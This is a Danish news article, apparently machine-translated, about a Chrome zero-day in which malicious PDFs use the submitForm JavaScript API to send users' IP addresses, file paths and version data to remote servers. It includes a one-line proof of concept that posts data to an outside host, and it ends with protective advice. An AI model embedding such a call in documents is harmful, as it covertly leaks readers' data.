Udnyt detekteringstjeneste EdgeSpot opdagede en spændende Chrome nul-dages sårbarhed, der udnyttede PDF-dokumenter. Sårbarheden giver angribere mulighed for at høste følsomme data ved hjælp af ondsindede PDF-dokumenter, der er åbnet i Chrome.

Så snart offeret åbner de respektive PDF-filer i Google Chrome, begynder et ondsindet program at arbejde i baggrunden ved at indsamle brugerdata.

Dataene videresendes derefter til den eksterne server, der kontrolleres af hackere. Du spekulerer måske på, hvilke data der suges af angribere, de målretter følgende data på din pc:

• IP-adresse
• PDF-filens fulde sti på systemet
• OS- og Chrome-versioner

Pas på malware-redede PDF-filer

Du kan blive overrasket over at vide, at der ikke sker noget, når Adobe Reader bruges til åbning af PDF-filer. Derudover bruges HTTP POST-anmodninger til at overføre data til fjernserverne uden brugerintervention.

Eksperter opdagede, at et af de to domæner readnotifycom eller burpcollaboratornet modtog dataene.

Du kan forestille dig intensiteten af ​​angrebet ved at overveje det faktum, at det meste af antivirus-softwaren ikke er i stand til at registrere de prøver, der er registreret af EdgeSpot.

Eksperter afslører, at angriberen bruger “this.submitForm ()” PDF Javascript API til at indsamle brugernes følsomme oplysninger.

Vi testede det med en minimal PoC, et simpelt API-opkald som "this.submitForm ('http://google.com/test')" får Google Chrome til at sende de personlige data til google.com.

Eksperterne fandt faktisk ud af, at denne Chrome-bug blev udnyttet af to forskellige sæt ondsindede PDF-filer. Begge blev cirkuleret i henholdsvis oktober 2017 og september 2018.

Navnlig kan de indsamlede data bruges af angribere til at finjustere angreb i fremtiden. Rapporter antyder, at den første batch af filer blev udarbejdet ved hjælp af ReadNotifys PDF-sporingstjeneste.

Brugere kan bruge tjenesten til at holde styr på brugervisninger. EdgeSpot har ikke delt nogen detaljer om arten af ​​det andet sæt PDF-filer.

Sådan forbliver du beskyttet

Exploit-detekteringstjenesten EdgeSpot ønskede at advare brugerne Chrome-brugere om de potentielle risici, fordi patch'en ikke forventes at blive frigivet i den nærmeste fremtid.

EdgeSpot rapporterede til Google om sårbarheden sidste år, og virksomheden lovede at frigive en patch i slutningen af ​​april. H

Du kan dog overveje at bruge en midlertidig løsning på problemet ved lokalt at se de modtagne PDF-dokumenter ved hjælp af en alternativ PDF-læser-app.

Alternativt kan du også åbne dine PDF-dokumenter i Chrome ved at afbryde dine systemer fra internettet. I mellemtiden kan du vente på Chrome 74-opdateringen, der forventes at blive rullet ud den 23. april.